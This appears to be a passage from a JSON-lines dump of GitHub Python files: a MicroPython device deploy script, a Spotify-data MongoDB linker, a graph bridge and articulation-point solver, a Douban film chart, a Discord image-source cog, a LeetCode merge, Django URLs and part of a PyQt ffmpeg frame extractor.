https://github.com/micropython/micropython\")\n os.chdir(os.getcwd() + \"/micropython/mpy-cross\")\n execute_shell_command(\"make\")\n os.chdir(pushd)\n\n for f in modified_relative_files:\n extension = os.path.splitext(f)[1]\n if extension == properties.sourceCodeExtension:\n log.info(\"Compiling file {}\".format(f))\n execute_shell_command(\"{}/micropython/mpy-cross/mpy-cross {}\".format(os.getcwd(), parser.options.path + properties.osDirSeparator + f))\n\n\n if parser.options.install or parser.options.profile:\n log.info(\"Installing ....\")\n\n # Create folder structure for modified files\n dir_structure = get_subdirectory_structure_by_filelist(modified_relative_files)\n log.info(\"Creating folder structure (if required)\")\n for d in dir_structure:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 mkdir {}\".format(d), stderr=subprocess.PIPE)\n\n # Do this for all files modified or new\n for f in modified_relative_files:\n # Skip if it's included in the skip file\n if f in skip_files:\n log.debug(\"Skipping '{}' although it was modified\".format(f))\n continue\n log.info(\"Installing file '{}'\".format(f))\n\n # Remove file to be uploaded\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}\".format(f), stderr=subprocess.PIPE)\n\n # Remove compiled file if exist\n if os.path.splitext(f)[1] == properties.sourceCodeExtension:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm {}{}\".format(os.path.splitext(f)[0],\n properties.binaryCodeExtension), stderr=subprocess.PIPE)\n\n # Prefer to install compiled file rather than source\n if parser.options.compile and os.path.splitext(f)[1] == properties.sourceCodeExtension:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator +\n os.path.splitext(f)[0] + properties.binaryCodeExtension,\n os.path.splitext(f)[0] + properties.binaryCodeExtension))\n\n # Workaround for these two 
files only since Micropython expects the uncompiled versions to be present as well\n if f in ['main.py', 'boot.py']:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator + f, f))\n\n # Otherwise upload original file\n else:\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(parser.options.path + properties.osDirSeparator + f, f))\n\n # Apply selected profile\n if parser.options.profile and check_folder_exists(\"{}/profile/{}\".format(parser.options.path, parser.options.profile)):\n log.info(\"Applying profile '{}'\".format(parser.options.profile))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm main.py\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm main.mpy\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 rm conf/profile.properties\", stderr=subprocess.PIPE)\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/{}\".format(parser.options.path, parser.options.profile, \"main.mpy\"), \"main.mpy\"))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/{}\".format(parser.options.path, parser.options.profile, \"main.py\"), \"main.py\"))\n execute_shell_command(\"sudo ampy --port /dev/ttyUSB0 put {} {}\".format(\"{}/profile/{}/conf/{}\".format(parser.options.path, parser.options.profile, \"profile.properties\"), \"conf/profile.properties\"))\n\n # Write installation timestamp\n with open(timestamp_file, \"w\") as text_file:\n text_file.write(\"{}\\n\".format(time.time()))\n\nelif parser.options.install and not modified_relative_files:\n log.warn(\"No modified files detected since last execution on {}. Installation skipped.\".format(timestamp_to_human_readable(timestamp)))\n\n\nlog.info(\"Execution time '{} sec'\".format(time.time() - start_time))\n\nif parser.options.connect:\n # CONNECT\n log.info(\"Connecting to '{}' ....\".format(parser.options.device))\n execute_shell_command(\"sudo picocom --baud 115200 /dev/ttyUSB0\")\n\n\n\n# Salute!\nlog.info(\"Bye bye! :-)\")\n","repo_name":"idimitrakopoulos/espedite","sub_path":"espedite.py","file_name":"espedite.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"73318171754","text":"\"\"\"\nScript that links:\n1) Artists to their Albums.\n2) Albums to their Artists and Songs.\n3) Songs to their Artists and Album.\n\n(Pseudocode)\nGet 'spotify_artists_data.jsonc' data\n\nfor artist_id in spotify_artists_data:\n # Get the artist\n artist: dict = spotify_artists_data[artist_id]\n\n # Get the artist's albums.\n artist_albums: List[dict] = artist['albums']\n\n # Iterate through artist's albums.\n for album in artist_albums:\n # Get the album document by spotify id\n # ! If album not found, throw error\n album_doc = Album.objects(spotifyId=artist_album['spotify_id'])[0]\n\n # Get the album's artists.\n album_artists = album['artists']\n\n # Iterate through the album's artists\n for album_artist in album_artists:\n # Get the artist document by spotify id\n # ! 
If artist not found, throw Error.\n            album_artist_doc = Artist.objects(spotifyId=album_artist['id'])[0]\n\n            # Link album's artists with album, and vice versa.\n            # Check if album_artist --> album\n            if album_artist_doc.id not in album_doc.artists:\n                album_doc.artists.append(album_artist_doc.id)\n                album_doc.save()\n\n            # Check if album --> album_artist:\n            if album_doc.id not in album_artist_doc.albums:\n                album_artist_doc.albums.append(album_doc.id)\n                album_artist_doc.save()\n\n        # Iterate through the album's tracks\n        for track in album['tracks']:\n            # Get the track document by spotify id\n            # ! If track not found, throw Error.\n            track_doc = Track.objects(spotifyId=track['spotify_id'])[0]\n\n            # Link track with it's album, and vice versa\n            # Check if track --> album\n            if track_doc.id not in album_doc.tracks:\n                album_doc.tracks.append(track_doc.id)\n                album_doc.save()\n\n            # Check if album --> track:\n            if album_doc.id != track_doc.album:\n                track_doc.album = album_doc.id\n                track_doc.save()\n\n            # Iterate through track's artists.\n            for track_artist in track['artists']:\n                # Get the track's artist by spotify id\n                # ! If artist not found, throw Error.\n                track_artist_doc = Artist.objects(spotifyId=track_artist['id'])\n\n                # Link track with it's artist(s), and vice versa\n                # Check if track_artist --> track\n                if track_artist_doc.id not in track_doc.artists:\n                    track_doc.artists.append(track_artist_doc.id)\n                    track_doc.save()\n\"\"\"\nimport os\nimport json\nimport time\nimport mongoengine\nfrom bson.objectid import ObjectId\n\nfrom typing import List\n\nfrom music_scraper.artist import Artist\nfrom music_scraper.album import Album\nfrom music_scraper.track import Track\n\nprint('--- RUNNING LINK DB ARTIST ALBUM SONG SCRIPT ---')\nstart_time = time.time()\n\nprint('Connecting to database...')\nmongodb_uri = os.environ['MONGODB_URI']\nmongoengine.connect('development', host=mongodb_uri)\n\nprint('Loading artist data set...')\nwith open(file=r'samples/responses/spotify_artists_data.jsonc', mode='r') as spotify_artists_data_file:\n    artists_data: dict = json.load(fp=spotify_artists_data_file)\n\ndef check_if_album_contains_artist(artist_id, album_doc: Album) -> bool:\n    # scan the whole list instead of returning on the first element\n    for album_artist in album_doc.artists:\n        if isinstance(album_artist, Artist) and artist_id == album_artist.id:\n            return True\n        if isinstance(album_artist, ObjectId) and artist_id == album_artist:\n            return True\n    return False\n\ndef check_if_artist_contains_album(album_id, artist_doc: Artist) -> bool:\n    for artist_album in artist_doc.albums:\n        if isinstance(artist_album, Album) and album_id == artist_album.id:\n            return True\n        if isinstance(artist_album, ObjectId) and album_id == artist_album:\n            return True\n    return False\n\ndef check_if_album_contains_track(track_id, album_doc: Album) -> bool:\n    for track in album_doc.tracks:\n        if isinstance(track, Track) and track_id == track.id:\n            return True\n        if isinstance(track, ObjectId) and track_id == track:\n            return True\n    return False\n\ndef check_if_track_contains_album(album_id, track_doc: Track) -> bool:\n    if isinstance(track_doc.album, Album):\n        return album_id == track_doc.album.id\n    elif isinstance(track_doc.album, ObjectId):\n        return album_id == track_doc.album\n    elif track_doc.album is None:\n        return False\n    else:\n        raise TypeError(\"Track document's type is neither Album or ObjectId\")\n\ndef check_if_track_contains_artist(artist_id, track_doc: Track) -> bool:\n    for artist in track_doc.artists:\n        if isinstance(artist, Artist) and artist_id == artist.id:\n            return True\n        if isinstance(artist, ObjectId) and artist_id == artist:\n            return True\n    return False\n    
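\n# Hedged usage sketch of the helpers above (the same guarded-append pattern appears\n# in the main loop below):\n#     if not check_if_album_contains_artist(artist_id=album_artist_doc.id, album_doc=album_doc):\n#         album_doc.artists.append(album_artist_doc.id)\n#         album_doc.save()\n# Note: the isinstance branches accept either dereferenced documents or raw ObjectIds,\n# since the reference-list fields may hold either form.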
\n\nprint('Starting script.')\nfor index, artist_id in enumerate(artists_data):\n print('Getting {} artist'.format(index + 1))\n # Get the artist\n artist: dict = artists_data[artist_id]\n\n # Get the artist's albums.\n artist_albums: List[dict] = artist['albums']\n\n # Iterate through artist's albums.\n for album in artist_albums:\n # Get the album document by spotify id\n # ! If album not found, throw Error.\n album_doc: Album = Album.objects(\n spotifyId=album['spotify_id']).first()\n\n # Get the album's artists.\n album_artists: List[dict] = album['artists']\n\n # Iterate through the album's artists\n for album_artist in album_artists:\n # Get the artist document by spotify id\n # ! If artist not found, throw Error.\n album_artist_doc: Artist = Artist.objects(spotifyId=album_artist['id']).first()\n\n if album_artist_doc != None:\n # Link album's artists with album, and vice versa.\n # Check if album_artist --> album\n if not check_if_album_contains_artist(artist_id=album_artist_doc.id, album_doc=album_doc):\n album_doc.artists.append(album_artist_doc.id)\n album_doc.save()\n\n # Check if album --> album_artist:\n if not check_if_artist_contains_album(album_id=album_doc.id, artist_doc=album_artist_doc):\n album_artist_doc.albums.append(album_doc.id)\n album_artist_doc.save()\n\n # Iterate through the album's tracks\n for track in album['tracks']:\n # Get the track document by spotify id\n # ! If track not found, throw Error.\n track_doc: Track = Track.objects(spotifyId=track['spotify_id']).first()\n\n if track_doc != None:\n # Link track with it's album, and vice versa\n # Check if track --> album\n if not check_if_album_contains_track(track_id=track_doc.id, album_doc=album_doc):\n album_doc.tracks.append(track_doc.id)\n album_doc.save()\n\n # Check if album --> track:\n if not check_if_track_contains_album(album_id=album_doc.id, track_doc=track_doc):\n track_doc.album = album_doc.id\n track_doc.save()\n\n # Iterate through track's artists.\n for track_artist in track['artists']:\n # Get the track's artist by spotify id\n # ! 
If artist not found, throw Error.\n track_artist_doc: Artist = Artist.objects(\n spotifyId=track_artist['id']).first()\n\n if track_artist_doc != None:\n # Link track with it's artist(s), and vice versa\n # Check if track_artist --> track\n if not check_if_track_contains_artist(artist_id=track_artist_doc.id, track_doc=track_doc):\n track_doc.artists.append(track_artist_doc.id)\n track_doc.save()\n\nprint(\"--- DONE: %s seconds ---\" % (time.time() - start_time))\n","repo_name":"justinyum98/music-scraper","sub_path":"samples/run_5_link_artists_albums_songs.py","file_name":"run_5_link_artists_albums_songs.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74688680231","text":"from sys import stdin\nfrom sys import setrecursionlimit\n\ndef foundBCC(lo): # st[lo:] es un bcc\n global bccCnt, st,bcc\n if len(st)==0: return\n for i in range(lo,len(st)):\n u,v = st[i]\n bcc[(u,v)] = bcc[(v,u)] = bccCnt\n bccCnt+=1\n st = st[:lo]\n return\n\n\ndef articulationPoint(u):\n global num,low, dfsCounter, p ,a ,g , counterChild, dfsParent,bridge, bccCnt, st,bcc\n num[u] = low[u] = dfsCounter\n dfsCounter+=1\n for v in g[u]:\n if(num[v]==-1):\n st.append((u,v))\n p[v] = u\n if(dfsParent == u):\n counterChild+=1\n articulationPoint(v)\n if(low[v]>=num[u]):\n a[u] = True\n if(low[v]>num[u]):\n bridge.append([min(u,v),max(u,v)])\n ##Biconected Component\n for lo in range(len(st)-1, -1, -1):\n if st[lo]==(u,v):\n foundBCC(lo)\n break \n low[u] = min(low[u],low[v])\n elif( v != p[u]):\n low[u] = min(low[u],num[v])\n \ndef main():\n global num,low, dfsCounter, p,a,g, counterChild, dfsParent,bridge, bccCnt, st,bcc\n n,e = [int(x) for x in stdin.readline().strip().split()]\n num = [ -1 for x in range(n+1)]\n low = [ -1 for x in range(n+1)]\n p = [ x for x in range(n+1)]\n a = [ False for x in range(n+1)]\n st = list()\n bridge = list()\n bcc = {}\n g = [[] for i in range(n+1)]\n for G in range(e):\n u,v = [int(x) for x in stdin.readline().strip().split()]\n g[u].append(v)\n g[v].append(u)\n dfsCounter = 0\n bccCnt = 0\n \n for i in range(n):\n if(num[i]==-1):\n dfsParent = i\n counterChild = 0\n num[i] = low[i] = dfsCounter\n articulationPoint(i)\n foundBCC(0)\n a[i] = counterChild>1\n\n\n print(\"Puntos de articulacion\")\n for i in range(n):\n if(a[i]):\n print(i)\n print(\"Puentes\")\n for i in bridge:\n print(*i)\n print(\"Biconectados\")\n for u in bcc:\n print(u,bcc[u])\n \nmain()\n","repo_name":"CrkJohn/ECIGMA","sub_path":"graphs/Python/puntosPuentesBiconectados.py","file_name":"puntosPuentesBiconectados.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43538281455","text":"import pymysql\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Timeline, Bar, Grid\n\n# 上映年份\nshowtime = []\n# 查询中外电影上映年份\ndef select_showtime():\n try:\n # 打开数据库连接\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='douban', charset='utf8')\n # 使用cursor方法创建一个游标\n cursor = conn.cursor()\n # 查询数据表数据\n # 查询上映年份\n sql = \"select distinct showtime from tb_film where showtime is not null order by showtime \"\n cursor.execute(sql)\n rows = cursor.fetchall()\n showtime.clear()\n for row in rows:\n showtime.append(row[0])\n # print(showtime)\n except Exception as e:\n print(e)\n # 回滚\n conn.rollback()\n finally:\n # 关闭cursor对象\n cursor.close()\n # 关闭数据库连接\n conn.close()\n return 
showtime\n\n\n# 查询评论人数Top10的电影\ndef select_film(i):\n # 电影名称集合\n filmname = []\n # 评论人数集合\n comment = []\n try:\n # 打开数据库连接\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='douban', charset='utf8')\n # 使用cursor方法创建一个游标\n cursor = conn.cursor()\n # 查询数据表数据\n # 查询电影评论人数前十的电影\n cursor.execute(\"select filmname,comments from tb_film where comments is not null and showtime > 0 and showtime <= %d order by comments desc limit 10\"%(i))\n # 电影名称、评论人数数集合\n name_list = cursor.fetchall()\n for row in name_list:\n # 电影名称集合\n filmname.append(row[0])\n # 评论人数集合\n comment.append(row[1])\n filmname.reverse()\n comment.reverse()\n # print(filmname)\n # print(comment)\n except Exception as e:\n print(e)\n # 回滚\n conn.rollback()\n finally:\n # 关闭cursor对象\n cursor.close()\n # 关闭数据库连接\n conn.close()\n return filmname, comment\n\ndef select_data(year):\n film_list=select_film(year)\n colors = [\n \"#546570\", \"#c4ccd3\", \"#bda29a\", \"#ca8622\", \"#d48265\",\n \"#6e7074\", \"#749f83\", \"#61a0a8\", \"#2f4554\", \"#c23531\",\n \"#6e7074\", \"#749f83\", \"#61a0a8\", \"#2f4554\", \"#c23531\"\n ]\n y = []\n for n in range(len(film_list[1])):\n y.append(\n opts.BarItem(\n name=film_list[0][n],\n value=film_list[1][n],\n itemstyle_opts=opts.ItemStyleOpts(color=colors[n]),\n )\n )\n return y\n\ndef show_comment_top():\n # 查找上映年份集合\n showtime=select_showtime()\n # 生成时间轴的图\n timeline = Timeline(init_opts=opts.InitOpts(page_title=\"豆瓣电影TOP250-评论人数TOP10的电影\"))\n for year in showtime:\n film_tuple=select_film(year)\n date_list=select_data(year)\n timeline.add_schema(is_auto_play=True, play_interval=1000)\n # 柱状图初始化\n bar = Bar()\n # 横坐标\n bar.add_xaxis(film_tuple[0])\n # 纵坐标\n bar.add_yaxis(\n \"\",\n date_list,\n # 数据靠右显示\n label_opts=opts.LabelOpts(is_show=True, position='right')\n )\n # 横纵坐标翻转\n bar.reversal_axis()\n # 全局配置\n bar.set_global_opts(\n # 标题\n title_opts=opts.TitleOpts(title=\"豆瓣电影TOP250-第{}年评论人数TOP10的电影\".format(year), pos_left='center'),\n # 横坐标隐藏\n xaxis_opts=opts.AxisOpts(is_show=False,split_number=10),\n # 纵坐标\n yaxis_opts=opts.AxisOpts(\n max_=9,\n # 字体大小\n axislabel_opts=opts.LabelOpts(font_size=10),\n # 隐藏坐标轴\n axisline_opts=opts.AxisLineOpts(is_show=False),\n # 隐藏刻度\n axistick_opts=opts.AxisTickOpts(is_show=False)\n )\n )\n # 组合组件\n grid = (\n Grid()\n .add(bar, grid_opts=opts.GridOpts(pos_top='8%', pos_bottom='12%', pos_left='25%'))\n )\n timeline.add(grid, \"{}年\".format(year))\n timeline.add_schema(is_auto_play=True, play_interval=1000,is_loop_play=False, width='820px', pos_left='60px')\n # 生成HTML\n html = \"pages/iframes/comment_top.html\"\n timeline.render(\"./templates/\" + html)\n return html\n\n","repo_name":"hxy-111/flask_douban","sub_path":"timeline_comment.py","file_name":"timeline_comment.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"34364421129","text":"\"\"\"\nDetects the source of an image using the unofficial saucenao API\n\"\"\"\n\nimport discord\nfrom discord.ext import commands as bot_commands\nfrom saucenao_api import SauceNao\nfrom utils import repo, logger\nclass SauceCog(bot_commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @bot_commands.command(aliases=[\"source\"])\n async def sauce(self, ctx):\n if ctx.message.reference == None:\n await ctx.send(\"This command only functions when used in a reply!\")\n return\n \n source = SauceNao(api_key=repo.config[\"keys\"][\"saucenao_api_key\"])\n\n reference = await 
ctx.channel.fetch_message(ctx.message.reference.message_id)\n if len(reference.attachments) > 0 or len(reference.embeds):\n output = \"\"\n for attachment in reference.attachments:\n try:\n output += f\"\\n{source.from_url(attachment.url)[0].urls[0]} (similarity: {source.from_url(attachment.url)[0].similarity})\"\n except Exception as e:\n logger.log(\"Source\", f\"Failed to read attachment {attachment.url}. {e}\")\n for embed in reference.embeds:\n try:\n output += f\"\\n{source.from_url(embed.thumbnail.url)[0].urls[0]} (similarity: {source.from_url(embed.thumbnail.url)[0].similarity})\"\n except Exception as e:\n logger.log(\"Source\", f\"Failed to read embed {embed.thumbnail.url}. {e}\")\n if len(output) > 0:\n await ctx.send(f\"Here's my best guess at the sources: {output}\")\n else:\n await ctx.send(f\"Failed to read the message, you may have to manually reverse-search this one\")\n else:\n await ctx.send(\"The replied message does not have any attachments, or could not be loaded.\")\n\n \n\n\ndef setup(bot):\n bot.add_cog(SauceCog(bot))","repo_name":"AriBowe/orb","sub_path":"cogs/orb_source.py","file_name":"orb_source.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"71646720234","text":"\"\"\"\nYou are given two integer arrays nums1 and nums2, sorted in non-decreasing order, \nand two integers m and n, representing the number of elements in nums1 and nums2 respectively.\n\nMerge nums1 and nums2 into a single array sorted in non-decreasing order.\n\nThe final sorted array should not be returned by the function, but instead be \nstored inside the array nums1. To accommodate this, nums1 has a length of m + n, \nwhere the first m elements denote the elements that should be merged, and the last \nn elements are set to 0 and should be ignored. nums2 has a length of n.\n\"\"\"\n\n\ndef merge( nums1: list[int], m: int, nums2: list[int], n: int) -> None:\n if not nums2:\n return\n \n for _ in range(n):\n nums1.pop()\n\n inserted = 0\n for num_to_insert in nums2:\n for i, num in enumerate(nums1):\n if num >= num_to_insert:\n nums1.insert(i, num_to_insert)\n inserted += 1\n break\n\n if inserted != len(nums2):\n nums1.extend(nums2[inserted:])","repo_name":"kennyhml/leetcode","sub_path":"easy/merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"69897385514","text":"# users/urls.py\n\n# Django modules\nfrom django.urls import path\n\n# Locals\nfrom . 
import views \n\napp_name = 'users'\n\nurlpatterns = [\n\tpath('register/', views.RegisterView.as_view(), name='register'),\n\tpath('login/', views.UserLoginView.as_view(), name='login'),\n\tpath('logout/', views.UserLogoutView.as_view(),name=\"logout\"),\n\n] ","repo_name":"gurnitha/django-fantom-blog","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10247457289","text":"''' Notes\r\nDownloaded K-Lite Video Codec to get the video player to work\r\n'''\r\n\r\n\r\n\r\n\r\nimport logging\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom time import time\r\nimport webbrowser\r\n\r\nfrom PyQt5.QtCore import QThread, QUrl, pyqtSignal, Qt\r\nfrom PyQt5.QtGui import QIcon, QPixmap, QIntValidator\r\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\r\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget\r\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QVBoxLayout, QHBoxLayout, \r\n QPushButton, QTextEdit, QProgressBar, QFileDialog, QLabel, \r\n QLineEdit, QComboBox, QWidget, QCheckBox, QSlider, \r\n QGroupBox, QLayout, QMessageBox)\r\n\r\nimport qdarktheme\r\n\r\n# Start Logging\r\nif not os.path.exists('./Logs'):\r\n os.makedirs('./Logs')\r\n \r\nlogging.basicConfig(filename='./Logs/log.log', level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n\r\nlogging.info(\"Application started.\")\r\n\r\nclass StreamToLogger:\r\n def __init__(self, original_stream, logger, log_level):\r\n self.original_stream = original_stream\r\n self.logger = logger\r\n self.log_level = log_level\r\n\r\n def write(self, message):\r\n if message.rstrip() != \"\":\r\n self.logger.log(self.log_level, message.rstrip())\r\n self.original_stream.write(message)\r\n\r\n def flush(self):\r\n self.original_stream.flush()\r\n\r\n# Redirect standard output and standard error\r\nsys.stdout = StreamToLogger(sys.stdout, logging.getLogger(), logging.INFO)\r\nsys.stderr = StreamToLogger(sys.stderr, logging.getLogger(), logging.ERROR)\r\n\r\n\r\n\r\ndef handle_uncaught_exception(exc_type, exc_value, exc_traceback):\r\n logging.error(\"Uncaught exception\",\r\n exc_info=(exc_type, exc_value, exc_traceback))\r\n\r\nsys.excepthook = handle_uncaught_exception\r\n\r\n\r\ndef get_video_duration(video_path):\r\n cmd = [\"ffmpeg\", \"-i\", video_path]\r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n for line in result.stderr.split(\"\\n\"):\r\n if \"Duration\" in line:\r\n time_parts = line.split(\",\")[0].split(\"Duration:\")[1].strip().split(\":\")\r\n hours, minutes, seconds = time_parts\r\n total_seconds = int(hours) * 3600 + int(minutes) * 60 + float(seconds)\r\n return total_seconds\r\n return None\r\n\r\nclass FrameExtractorWorker(QThread):\r\n # Signals\r\n update_progress_signal = pyqtSignal(int)\r\n update_status_signal = pyqtSignal(str)\r\n update_frames_signal = pyqtSignal(str)\r\n first_frame_signal = pyqtSignal(str)\r\n last_frame_signal = pyqtSignal(str)\r\n extraction_completed_signal = pyqtSignal(int, str) \r\n \r\n\r\n\r\n\r\n def __init__(self, video_path, output_dir, interval, frame_name, output_format, resolution, use_gpu=False, gpu_method=\"\"):\r\n super().__init__()\r\n self.video_path = video_path\r\n self.output_dir = output_dir\r\n self.interval = interval\r\n self.frame_name = frame_name\r\n self.output_format = output_format\r\n 
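# Note (derived from run() below): \"resolution\" is expected as a plain\r\n        # \"WIDTHxHEIGHT\" string such as \"1920x1080\", because run() splits it on \"x\"\r\n        # to build ffmpeg's scale filter.\r\n        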
self.resolution = resolution\r\n self.cancel_extraction = False\r\n self.use_gpu = use_gpu\r\n self.gpu_method = gpu_method\r\n \r\n\r\n def run(self):\r\n if not os.path.exists(self.output_dir):\r\n os.makedirs(self.output_dir)\r\n\r\n video_duration = get_video_duration(self.video_path)\r\n if video_duration is None:\r\n error_msg = \"Couldn't determine video duration. Exiting.\"\r\n print(error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n num_screenshots = int(video_duration) // self.interval\r\n start_time = time()\r\n\r\n for i in range(num_screenshots):\r\n if self.cancel_extraction:\r\n self.update_status_signal.emit(\"Extraction Cancelled!\")\r\n break\r\n\r\n timestamp = i * self.interval\r\n base_name = self.frame_name if self.frame_name else \"frame\"\r\n output_file = os.path.join(self.output_dir, f\"{base_name}_{i:03d}.{self.output_format}\")\r\n\r\n # Determine the codec based on the selected format\r\n codec = self.output_format\r\n if codec == \"jpg\":\r\n codec = \"mjpeg\"\r\n elif codec == \"png\":\r\n codec = \"png\"\r\n elif codec == \"bmp\":\r\n codec = \"bmp\"\r\n elif codec == \"tiff\":\r\n codec = \"tiff\"\r\n\r\n width, height = self.resolution.split(\"x\")\r\n cmd = [\"ffmpeg\", \"-ss\", str(timestamp), \"-i\", self.video_path, \"-vf\", f\"scale={width}:{height}\", \"-vframes\", \"1\", \"-c:v\", codec, \"-an\", output_file]\r\n\r\n\r\n\r\n if self.use_gpu:\r\n if self.gpu_method == \"cuda\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"cuda\")\r\n elif self.gpu_method == \"dxva2\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"dxva2\")\r\n elif self.gpu_method == \"qsv\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"qsv\")\r\n elif self.gpu_method == \"d3d11va\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"d3d11va\")\r\n elif self.gpu_method == \"opencl\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"opencl\")\r\n elif self.gpu_method == \"vulkan\":\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, \"vulkan\")\r\n\r\n \r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n if result.returncode != 0:\r\n error_msg = f\"Error on extracting frame {i}: {result.stderr}\"\r\n print(error_msg)\r\n logging.error(error_msg)\r\n\r\n # Emit signals for UI updates\r\n elapsed_time = time() - start_time\r\n remaining_time = ((video_duration - (i * self.interval)) / self.interval) * (elapsed_time / (i+1))\r\n self.update_progress_signal.emit(int((i + 1) / num_screenshots * 100))\r\n self.update_status_signal.emit(f\"Elapsed Time: {int(elapsed_time)}s | Time Remaining: {int(remaining_time)}s\")\r\n self.update_frames_signal.emit(f\"Frames Created: {i+1}/{num_screenshots}\")\r\n\r\n # Emit signal for the first frame only once\r\n if i == 0:\r\n self.first_frame_signal.emit(output_file)\r\n\r\n # Emit signal for the last frame after every extraction\r\n self.last_frame_signal.emit(output_file)\r\n \r\n if not self.cancel_extraction:\r\n self.extraction_completed_signal.emit(num_screenshots, self.output_dir)\r\n\r\n\r\n\r\n def stop(self):\r\n self.cancel_extraction = True\r\n\r\nclass FFmpegFrameExtractorApp(QMainWindow):\r\n\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n \r\n # Connect to the mediaStatusChanged signal\r\n self.video_player.mediaStatusChanged.connect(self.handle_media_status_change)\r\n\r\n def initUI(self):\r\n main_widget = QWidget(self)\r\n self.setCentralWidget(main_widget)\r\n\r\n main_layout = QHBoxLayout() 
# Changed to QHBoxLayout for main layout\r\n \r\n\r\n # Left side layout\r\n left_layout = QVBoxLayout()\r\n\r\n # New vertical layout for the settings and progress bar\r\n settings_layout = QVBoxLayout()\r\n \r\n # Dark theme toggle checkbox\r\n self.dark_mode_checkbox = QCheckBox(\"Dark Mode\", self)\r\n self.dark_mode_checkbox.stateChanged.connect(self.toggle_dark_mode)\r\n settings_layout.addWidget(self.dark_mode_checkbox)\r\n \r\n # Toggle Video Player\r\n self.toggle_video_player_checkbox = QCheckBox(\"Show Video Player\", self)\r\n self.toggle_video_player_checkbox.setChecked(False) # Default to not showing the video player\r\n self.toggle_video_player_checkbox.stateChanged.connect(self.toggle_video_player)\r\n settings_layout.addWidget(self.toggle_video_player_checkbox)\r\n\r\n # Toggle Frame Previews\r\n self.toggle_frame_previews_checkbox = QCheckBox(\"Show Frame Previews\", self)\r\n self.toggle_frame_previews_checkbox.setChecked(False) # Default to not showing the frame previews\r\n self.toggle_frame_previews_checkbox.stateChanged.connect(self.toggle_frame_previews)\r\n settings_layout.addWidget(self.toggle_frame_previews_checkbox)\r\n\r\n\r\n # File Frame\r\n \r\n # Video Path\r\n self.video_path_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Video Path:\"))\r\n self.browse_video_btn = QPushButton(QIcon('./images/browse.png'), \"\", self)\r\n self.browse_video_btn.clicked.connect(self.select_video_file)\r\n video_path_layout = QHBoxLayout()\r\n video_path_layout.addWidget(self.video_path_entry)\r\n video_path_layout.addWidget(self.browse_video_btn)\r\n settings_layout.addLayout(video_path_layout)\r\n\r\n # Output Directory\r\n self.output_dir_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Output Directory:\"))\r\n self.browse_output_dir_btn = QPushButton(QIcon('./images/browse.png'), \"\", self)\r\n self.browse_output_dir_btn.clicked.connect(self.select_output_directory)\r\n output_dir_layout = QHBoxLayout()\r\n output_dir_layout.addWidget(self.output_dir_entry)\r\n output_dir_layout.addWidget(self.browse_output_dir_btn)\r\n settings_layout.addLayout(output_dir_layout)\r\n\r\n \r\n # More Settings\r\n \r\n # #Interval Slider\r\n self.interval_slider = QSlider(Qt.Horizontal, self)\r\n self.interval_slider.setRange(1, 600) # 1 to 600 seconds range\r\n self.interval_slider.setValue(10) # Default value\r\n self.interval_slider.valueChanged.connect(self.update_interval_entry)\r\n\r\n self.interval_entry = QLineEdit(\"10\", self) # Default value\r\n self.interval_entry.setValidator(QIntValidator(1, 600)) # Only allow integers between 1 and 